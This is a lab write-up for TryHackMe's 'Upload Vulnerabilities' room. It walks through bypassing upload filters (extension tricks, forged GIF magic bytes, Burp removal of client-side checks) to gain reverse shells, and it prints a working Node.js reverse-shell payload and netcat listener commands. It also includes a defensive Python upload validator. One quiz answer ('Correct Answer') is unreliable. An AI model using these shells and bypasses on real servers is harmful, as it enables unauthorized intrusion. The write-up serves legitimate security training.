This is the write-up for the room Upload Vulnerabilities on TryHackMe; it is part of the Web Fundamentals path.
Connect to the TryHackMe lab environment through the VPN, or use the AttackBox on the TryHackMe site.
TASKS Upload Vulnerabilities
Task 1
Follow along with this task; it is self-explanatory. This is very important, otherwise you will not be able to clear the rest of this room.
There is only one command you need to enter in the terminal:
echo "<MACHINE_IP> overwrite.uploadvulns.thm shell.uploadvulns.thm java.uploadvulns.thm annex.uploadvulns.thm magic.uploadvulns.thm jewel.uploadvulns.thm" | sudo tee -a /etc/hosts
To revert:
sudo sed -i '$d' /etc/hosts
Task 2
Read everything in this task and press Complete.
Task 3
Read everything in this task and press Complete.
Task 4
Read all that is in this task
4.1 What is the name of the image file which can be overwritten?
Open the website http://overwrite.uploadvulns.thm/
Right-click the image and choose View Image Info.
4.2 Overwrite the image. What is the flag you receive?
Now upload a file called mountains.jpg.
Task 5
Read all that is in the task
Navigate to shell.uploadvulns.thm and complete the questions for this task.
5.1 Run a Gobuster scan on the website using the syntax from the screenshot above. What directory looks like it might be used for uploads? (N.B. This is a good habit to get into, and will serve you well in the upcoming tasks…)
First we run gobuster by typing in:
gobuster dir -u http://shell.uploadvulns.thm -w /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt
Type the command in rather than copying it; copying sometimes gives errors.
Now upload a file so we can see where it is added (select the file, then press Upload). I have uploaded mountains.jpg.
And we see it in resources.
5.2 Get either a web shell or a reverse shell on the machine.
What’s the flag in the /var/www/ directory of the server?
Let's go for a reverse shell.
First we need to copy the correct shell to use. It comes with Kali.
Type in the following command to copy the webshell so we can edit the copy and leave the original as it is:
cp /usr/share/webshells/php/php-reverse-shell.php ~/Downloads/shell.php
cd ~/Downloads/
nano shell.php
Now change the IP to your tun0 IP.
We leave the port as is. Now press Ctrl+X to exit and save.
Start a listener by typing in the following command:
nc -nlvp 1234
Now upload shell.php and check the resources page.
Click on it and go back to the terminal where we started the listener,
and we have a shell.
Now type in:
cd /var/www
ls
cat flag.txt
Task 6
Read all that is in the task.
6.1 What is the traditional server-side scripting language?
Answer: php
6.2 When validating by file extension, what would you call a list of accepted extensions (whereby the server rejects any extension not in the list)?
Answer: Correct Answer
6.3 [Research] What MIME type would you expect to see when uploading a CSV file?
You can guess this one: a CSV file is always a text file, since many systems can read it.
Answer: text/csv
Task 7
Read all that is in the task
7.1 What is the flag in /var/www/?
If you want to scan with gobuster you can, by typing in the following command:
gobuster dir -u http://java.uploadvulns.thm -w /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt
This will reveal the images and assets directories.
We will use the webshell.php from the previous task.
Start up Burp Suite and turn intercept on. Follow this guide if you do not know how to configure Firefox with Burp: Configure Burpsuite with Firefox.
Now navigate to the page http://java.uploadvulns.thm/
You will see this:
Right-click and choose Do intercept -> Response to this request.
Then press Forward.
Now delete the client-side filter and press Forward.
Now go back to the site and upload the webshell.php.
Once you see the webshell in Burp you can turn intercept off, or press Forward until you see a successful upload.
Now start up a listener in a terminal by typing:
nc -nlvp 1234
Now go to the images directory we found and click on shell.php:
http://java.uploadvulns.thm/images/
cat /var/www/flag.txt
Task 8
Read all that is in the task
8.1 What is the flag in /var/www/?
First we run gobuster by typing in:
gobuster dir -u http://annex.uploadvulns.thm -w /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt
We find:
Use the select command to select a file and then type upload to upload the file. We notice webshell.php is invalid, so we open the given wiki page and find all the PHP extensions we can try.
By renaming webshell.php to webshell.php5 and uploading it we have success.
It also changes the name. Now start up a listener with the following command:
nc -nlvp 1234
Click on the php5 file in the privacy directory and notice the shell.
Cat out the flag by typing:
cat /var/www/flag.txt
Task 9
9.1 Grab the flag from /var/www/
First we do a directory scan by typing in the following command:
gobuster dir -u http://magic.uploadvulns.thm -w /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt
The graphics directory is forbidden.
Now we try to upload the shell.php file and we see an error.
So it wants a GIF file. Let's see if we can do the magic number hack here.
First make a copy of shell.php, just in case we need to revert.
I will copy and rename the file to magic.php by typing in the following command:
cp shell.php magic.php
Here we can find the list of signatures: List of file signatures – Wikipedia.
For GIF there are two:
47 49 46 38 37 61 (GIF87a)
47 49 46 38 39 61 (GIF89a)
The signature is 6 bytes long. Add AAAAAA to the start of magic.php as a placeholder:
nano magic.php
Save the file, then open it in hexeditor by typing:
hexeditor magic.php
Now change those six bytes to the signature we found.
Now upload this file
Start a listener by typing in:
nc -nlvp 1234
Indexing is off on the server, so we need to type in the following URL:
http://magic.uploadvulns.thm/graphics/magic.php
cat /var/www/flag.txt
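As an added example (not part of the room or this write-up), here is a server-side check in Python that combines the defences Tasks 6, 8 and 9 bypass one at a time: an extension allowlist, a magic-byte check tied to the allowlisted type, and a server-chosen file name. The allowlist, function names and sample uploads are my own constructions.

```python
import os
import secrets

# Illustrative allowlist of accepted extensions, each mapped to the magic
# bytes its content must start with. Anything not listed (.php, .php5,
# .phtml, .js, ...) is rejected, so no denylist has to be kept up to date.
ALLOWED = {
    ".jpg": [b"\xff\xd8\xff"],
    ".jpeg": [b"\xff\xd8\xff"],
    ".gif": [b"GIF87a", b"GIF89a"],  # 47 49 46 38 37 61 / 47 49 46 38 39 61
    ".png": [b"\x89PNG\r\n\x1a\n"],
}

def validate_upload(filename: str, data: bytes) -> tuple[bool, str]:
    """Return (accepted, reason). The client's Content-Type header is not
    consulted at all: it is attacker-controlled and proves nothing."""
    # Judge only the final extension, lower-cased, because that is what the
    # web server will look at when deciding whether to execute the file.
    ext = os.path.splitext(os.path.basename(filename))[1].lower()
    if ext not in ALLOWED:
        return False, f"extension {ext or '(none)'} not in allowlist"
    # The bytes must carry the signature of the type the name claims, so a
    # GIF header pasted onto a script does not help once the name is wrong.
    if not any(data.startswith(sig) for sig in ALLOWED[ext]):
        return False, f"content does not match {ext} signature"
    # A .gif that starts with GIF89a passes even if script code follows, so
    # the stored copy must also live outside any script-executing directory.
    return True, "ok"

def stored_name(ext: str) -> str:
    """Server-chosen random name; the client-supplied name never hits disk."""
    return secrets.token_hex(8) + ext

# Constructed sample uploads mirroring the attempts made in the room.
SAMPLES = {
    "mountains.jpg": b"\xff\xd8\xff\xe0" + b"\x00" * 16,   # real JPEG header
    "webshell.php5": b"<?php echo 'not an image'; ?>",      # Task 8 rename
    "magic.php":     b"GIF89a<?php echo 'not an image'; ?>",  # Task 9 magic bytes
    "shell.jpg":     b"<?php echo 'not an image'; ?>",      # renamed only
    "shell.jpg.php": b"GIF87a",                             # double extension
}

def run_samples() -> dict[str, bool]:
    """Map each sample name to whether the validator accepts it."""
    return {name: validate_upload(name, data)[0] for name, data in SAMPLES.items()}

if __name__ == "__main__":
    for name, ok in run_samples().items():
        print(f"{name:15} {'accepted' if ok else 'rejected'}")
```

Only mountains.jpg is accepted; the renamed, double-extension and forged-header samples all fail one of the two checks.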
Task 10
Read everything in this task and press Complete.
Task 11
11. Hack the machine and grab the flag from /var/www/
OK, now for the fun part.
Run gobuster first
Now go to the site jewel.uploadvulns.thm
Let's try to upload a file; it tells me it wants a JPG file.
Looking at the source we see upload.js, and clicking on it reveals the client-side filters.
Let's try to bypass this client filter; there will probably also be one on the server side. However, first let us analyse the web page.
It is Node.js. This means the reverse shell we used probably does not work.
On this page we find a payload we can use.
Payload:
(function(){
    var net = require("net"),
        cp = require("child_process"),
        sh = cp.spawn("/bin/sh", []);
    var client = new net.Socket();
    client.connect(443, "10.0.0.1", function(){
        client.pipe(sh.stdin);
        sh.stdout.pipe(client);
        sh.stderr.pipe(client);
    });
    return /a/; // Prevents the Node.js application from crashing
})();
Save this as shell.js and adjust the payload to your IP, using port number 443.
Now we need to bypass the filter in order to upload. To do this we need to deactivate the client filter first. Looking at the source we see an upload.js that holds the filters, as we have seen.
Start up Burp Suite and turn on intercept.
Reload the page by pressing Ctrl+F5 so it flushes the cached upload.js.
In Burp Suite, press Forward until you find upload.js.
If you do not get this screen, go to Options and turn off the file extension rule under Intercept Client Requests.
Now click Forward until you see this JavaScript.
Delete the highlighted functions and press Forward.
When uploading the file we still get "invalid format". Change the name of the file to shell.jpg and try again.
Now we need to find where the file is stored so we can run it
With dirbuster we have found an admin page. Navigating to this admin page reveals:
This is probably where we need to activate it from. It also tells us a module directory.
Download the attached file and use it with dirbuster to scan the directories we found.
I'm sure our file is here, so let's upload the file again and then run dirbuster again.
Now we know where the file is. Next we need to find a way to execute it.
First start a listener on port 443 by typing in a terminal
nc -nlvp 443
Go back to the admin page and enter the file name AZC.jpg.
Open Burp and intercept the request.
Go to the admin page again; this time we go up a directory and into the content directory.
Go back to the terminal where the listener was started.
cat the flag with the command
cat /var/www/flag.txt
Now we have completed this challenge and the room Upload Vulnerabilities. I must admit I did take a look at the hints. I was more stuck on Burp Suite, getting hold of upload.js in order to bypass it. Clearing out the Firefox cache and turning off the file extensions in Burp did the trick.